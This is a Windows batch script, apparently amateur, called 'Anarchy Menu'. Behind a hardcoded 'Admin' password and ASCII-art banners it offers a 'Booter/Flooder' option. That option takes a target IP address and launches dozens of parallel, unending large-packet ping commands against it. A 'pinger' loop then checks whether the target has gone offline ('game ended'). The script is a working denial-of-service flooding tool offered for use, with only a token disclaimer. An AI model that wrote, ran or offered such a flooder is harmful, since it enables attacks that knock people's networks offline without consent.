@echo off
cls
title LOGIN 1.0
color d
echo.
echo ooooo                                o88               
echo  888          ooooooo     oooooooo8  oooo  oo oooooo   
echo  888        888     888 888    88o    888   888   888  
echo  888      o 888     888  888oo888o    888   888   888  
echo o888ooooo88   88ooo88   888     888  o888o o888o o888o 
echo                          888ooo888                     
echo.
echo Please sign in with the password and you will be redirect to the Menu *CASE SENSITVE OR ELSE*
echo.
echo Enter full screen please.
set password==True
set code=Admin
:password
if %password%==True (
goto type
)
if %password%==False (
pause
)
::===

:type
echo.
set /p pass= Password:
if %pass%==%code% (
echo correct You are a good boy 
pause
)
if not %pass%==%code% (
echo Sorry Wrong password try again please.
pause
goto password
)
:MadeByAj

echo off
color 4
goto menu0

:menu0
echo ...
timeout 1 >nul


:menu1
echo off & cls
color d
echo.
echo.
echo                AAA                                                                                           hhhhhhh                                      
echo               A:::A                                                                                          h:::::h                                      
echo              A:::::A                                                                                         h:::::h                                      
echo             A:::::::A                                                                                        h:::::h                                      
echo            A:::::::::A           nnnn  nnnnnnnn      aaaaaaaaaaaaa   rrrrr   rrrrrrrrr       cccccccccccccccc h::::h hhhhh       yyyyyyy           yyyyyyy
echo           A:::::A:::::A          n:::nn::::::::nn    a::::::::::::a  r::::rrr:::::::::r    cc:::::::::::::::c h::::hh:::::hhh     y:::::y         y:::::y 

timeout 1 >nul
goto menu2













:menu2
echo off & cls
color 4
echo.
echo.
echo                AAA                                                                                           hhhhhhh                                      
echo               A:::A                                                                                          h:::::h                                      
echo              A:::::A                                                                                         h:::::h                                      
echo             A:::::::A                                                                                        h:::::h                                      
echo            A:::::::::A           nnnn  nnnnnnnn      aaaaaaaaaaaaa   rrrrr   rrrrrrrrr       cccccccccccccccc h::::h hhhhh       yyyyyyy           yyyyyyy
echo           A:::::A:::::A          n:::nn::::::::nn    a::::::::::::a  r::::rrr:::::::::r    cc:::::::::::::::c h::::hh:::::hhh     y:::::y         y:::::y 
echo          A:::::A A:::::A         n::::::::::::::nn   aaaaaaaaa:::::a r:::::::::::::::::r  c:::::::::::::::::c h::::::::::::::hh    y:::::y       y:::::y  
echo         A:::::A   A:::::A        nn:::::::::::::::n           a::::a rr::::::rrrrr::::::rc:::::::cccccc:::::c h:::::::hhh::::::h    y:::::y     y:::::y   
echo        A:::::A     A:::::A         n:::::nnnn:::::n    aaaaaaa:::::a  r:::::r     r:::::rc::::::c     ccccccc h::::::h   h::::::h    y:::::y   y:::::y    
echo       A:::::AAAAAAAAA:::::A        n::::n    n::::n  aa::::::::::::a  r:::::r     rrrrrrrc:::::c              h:::::h     h:::::h     y:::::y y:::::y     
echo      A:::::::::::::::::::::A       n::::n    n::::n a::::aaaa::::::a  r:::::r            c:::::c              h:::::h     h:::::h      y:::::y:::::y      
echo     A:::::AAAAAAAAAAAAA:::::A      n::::n    n::::na::::a    a:::::a  r:::::r            c::::::c     ccccccc h:::::h     h:::::h       y:::::::::y       


timeout 1 >nul
goto menu3



:menu3
echo off & cls
color d
echo.
echo.
echo                AAA                                                                                           hhhhhhh                                      
echo               A:::A                                                                                          h:::::h                                      
echo              A:::::A                                                                                         h:::::h                                      
echo             A:::::::A                                                                                        h:::::h                                      
echo            A:::::::::A           nnnn  nnnnnnnn      aaaaaaaaaaaaa   rrrrr   rrrrrrrrr       cccccccccccccccc h::::h hhhhh       yyyyyyy           yyyyyyy
echo           A:::::A:::::A          n:::nn::::::::nn    a::::::::::::a  r::::rrr:::::::::r    cc:::::::::::::::c h::::hh:::::hhh     y:::::y         y:::::y 
echo          A:::::A A:::::A         n::::::::::::::nn   aaaaaaaaa:::::a r:::::::::::::::::r  c:::::::::::::::::c h::::::::::::::hh    y:::::y       y:::::y  
echo         A:::::A   A:::::A        nn:::::::::::::::n           a::::a rr::::::rrrrr::::::rc:::::::cccccc:::::c h:::::::hhh::::::h    y:::::y     y:::::y   
echo        A:::::A     A:::::A         n:::::nnnn:::::n    aaaaaaa:::::a  r:::::r     r:::::rc::::::c     ccccccc h::::::h   h::::::h    y:::::y   y:::::y    
echo       A:::::AAAAAAAAA:::::A        n::::n    n::::n  aa::::::::::::a  r:::::r     rrrrrrrc:::::c              h:::::h     h:::::h     y:::::y y:::::y     
echo      A:::::::::::::::::::::A       n::::n    n::::n a::::aaaa::::::a  r:::::r            c:::::c              h:::::h     h:::::h      y:::::y:::::y      
echo     A:::::AAAAAAAAAAAAA:::::A      n::::n    n::::na::::a    a:::::a  r:::::r            c::::::c     ccccccc h:::::h     h:::::h       y:::::::::y       
echo    A:::::A             A:::::A     n::::n    n::::na::::a    a:::::a  r:::::r            c:::::::cccccc:::::c h:::::h     h:::::h        y:::::::y        
echo   A:::::A               A:::::A    n::::n    n::::na:::::aaaa::::::a  r:::::r             c:::::::::::::::::c h:::::h     h:::::h         y:::::y         
echo   A:::::A                 A:::::A   n::::n    n::::n a::::::::::aa:::a r:::::r              cc:::::::::::::::c h:::::h     h:::::h        y:::::y          
echo  AAAAAAA                   AAAAAAA  nnnnnn    nnnnnn  aaaaaaaaaa  aaaa rrrrrrr                cccccccccccccccc hhhhhhh     hhhhhhh       y:::::y           
echo                                                                                                                                         y:::::y            



timeout 1 >nul
goto menu






:menu
echo off & cls
color 4 
Title Anarchy Menu V1.2


echo.
echo.
echo                AAA                                                                                           hhhhhhh                                      
echo               A:::A                                                                                          h:::::h                                      
echo              A:::::A                                                                                         h:::::h                                      
echo             A:::::::A                                                                                        h:::::h                                      
echo            A:::::::::A           nnnn  nnnnnnnn      aaaaaaaaaaaaa   rrrrr   rrrrrrrrr       cccccccccccccccc h::::h hhhhh       yyyyyyy           yyyyyyy
echo           A:::::A:::::A          n:::nn::::::::nn    a::::::::::::a  r::::rrr:::::::::r    cc:::::::::::::::c h::::hh:::::hhh     y:::::y         y:::::y 
echo          A:::::A A:::::A         n::::::::::::::nn   aaaaaaaaa:::::a r:::::::::::::::::r  c:::::::::::::::::c h::::::::::::::hh    y:::::y       y:::::y  
echo         A:::::A   A:::::A        nn:::::::::::::::n           a::::a rr::::::rrrrr::::::rc:::::::cccccc:::::c h:::::::hhh::::::h    y:::::y     y:::::y   
echo        A:::::A     A:::::A         n:::::nnnn:::::n    aaaaaaa:::::a  r:::::r     r:::::rc::::::c     ccccccc h::::::h   h::::::h    y:::::y   y:::::y    
echo       A:::::AAAAAAAAA:::::A        n::::n    n::::n  aa::::::::::::a  r:::::r     rrrrrrrc:::::c              h:::::h     h:::::h     y:::::y y:::::y     
echo      A:::::::::::::::::::::A       n::::n    n::::n a::::aaaa::::::a  r:::::r            c:::::c              h:::::h     h:::::h      y:::::y:::::y      
echo     A:::::AAAAAAAAAAAAA:::::A      n::::n    n::::na::::a    a:::::a  r:::::r            c::::::c     ccccccc h:::::h     h:::::h       y:::::::::y       
echo    A:::::A             A:::::A     n::::n    n::::na::::a    a:::::a  r:::::r            c:::::::cccccc:::::c h:::::h     h:::::h        y:::::::y        
echo   A:::::A               A:::::A    n::::n    n::::na:::::aaaa::::::a  r:::::r             c:::::::::::::::::c h:::::h     h:::::h         y:::::y         
echo   A:::::A                 A:::::A   n::::n    n::::n a::::::::::aa:::a r:::::r              cc:::::::::::::::c h:::::h     h:::::h        y:::::y          
echo  AAAAAAA                   AAAAAAA  nnnnnn    nnnnnn  aaaaaaaaaa  aaaa rrrrrrr                cccccccccccccccc hhhhhhh     hhhhhhh       y:::::y           
echo                                                                                                                                         y:::::y            
echo                                                                                                                                        y:::::y             
echo                                                                                                                                       y:::::y              
echo                                                                                                                                      y:::::y               
echo                                                                                                                                     yyyyyyy         
echo.
echo You are running v1.2
echo.
echo Choose one.
echo.
echo -------- 
echo 1=Pinger
echo --------
echo 2=Booter
echo --------
echo 3=Socials
echo --------
echo 4=MyIp
echo --------
echo 5=exit
echo --------
echo.
set /p Ans=Enter Number Here:
if %Ans% ==1 goto pingboy

if %Ans% ==2 goto DEATH

if %Ans% ==3 goto clout

if %Ans% ==4 goto MyIp

if %Ans% ==5 goto leave

goto menu

:pingboy 
@echo off & cls 

color c

title ANARCHY pinger (V2)(WIP)

:B
echo off & cls
echo.
echo.
echo OooOOo.  ooOoOOo o.     O  .oOOOo.  o.OOoOoo `OooOOo.  
echo O     `O    O    Oo     o .O     o   O        o     `o 
echo o      O    o    O O    O o          o        O      O 
echo O     .o    O    O  o   o O          ooOO     o     .O 
echo oOooOO'     o    O   o  O O   .oOOo  O        OOooOO'  
echo o           O    o    O O o.      O  o        o    o   
echo O           O    o     Oo  O.    oO  O        O     O  
echo o'       ooOOoOo O     `o   `OooO'  ooOooOoO  O      o 
echo.
echo.
echo.
echo Pinging is when you send a packet to someone and have it sent back to check network speeds.
echo.
echo.
set /p IP=IP Insert Ip here or b for back:
if %IP% ==b goto menu
:f
PING -n 1 %IP% | FIND "TTL="
IF ERRORLEVEL 1 (echo your boi got game ended %IP%) 
ping -t 2 0 10 127.0.0.1 >nul
GoTo f
goto pingboy

:DEATH
cls
title Anarchy Flooder V3 WIP
color 4

echo.
echo.
echo 88888888b dP         .88888.   .88888.  888888ba   88888888b  888888ba  
echo 88        88        d8'   `8b d8'   `8b 88    `8b  88         88    `8b 
echo a88aaaa   88        88     88 88     88 88     88 a88aaaa    a88aaaa8P' 
echo 88        88        88     88 88     88 88     88  88         88   `8b. 
echo 88        88        Y8.   .8P Y8.   .8P 88    .8P  88         88     88 
echo dP        88888888P  `8888P'   `8888P'  8888888P   88888888P  dP     dP 
                                               
echo.
echo.
Echo !!WARNING THIS WILL OPEN MULTIPLE WINDOWS AND WILL FLOOD THE TARGET IP YOU ENTER!!
echo.
echo please make sure computer can handle about 28 windows.
echo.
echo we are not responsible for what you use this for.
echo.
echo DDosing is illegal when consent is not provided by the target.
echo.
echo Tip. You can do this command multiple times for more windows flooding the target at once.
echo.
set /p Ip=Enter Ip or b for back::
if %Ip% == b goto menu
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
start ping %IP% -t -l 65500
goto DEATH

:clout
start https://www.youtube.com/channel/UCAq3BzhtVrawHMuW5-drV9Q
start https://www.youtube.com/channel/UCMOAOGcoEKBh-sq18E4RF9w
echo Thank You So Much
echo Thank You So Much
echo Thank You So Much
echo Thank You So Much
echo Thank You So Much
echo Thank You So Much
echo Thank You So Much
Timeout /t 5 >Nul
goto menu

:MyIp
start https://whatismyipaddress.com/
goto menu

:leave
echo off

title Bye Friend!

echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
timeout 2 >nul
echo We are sad you leave but happy you will come again! -AJ
timeout 2 >nul
echo.
timeout 1 >nul
echo.
timeout 1 >nul
echo.
timeout 1 >nul
echo Bye dude. -Brody
Timeout 2 >nul
echo.

echo.
timeout 1 >nul
exit
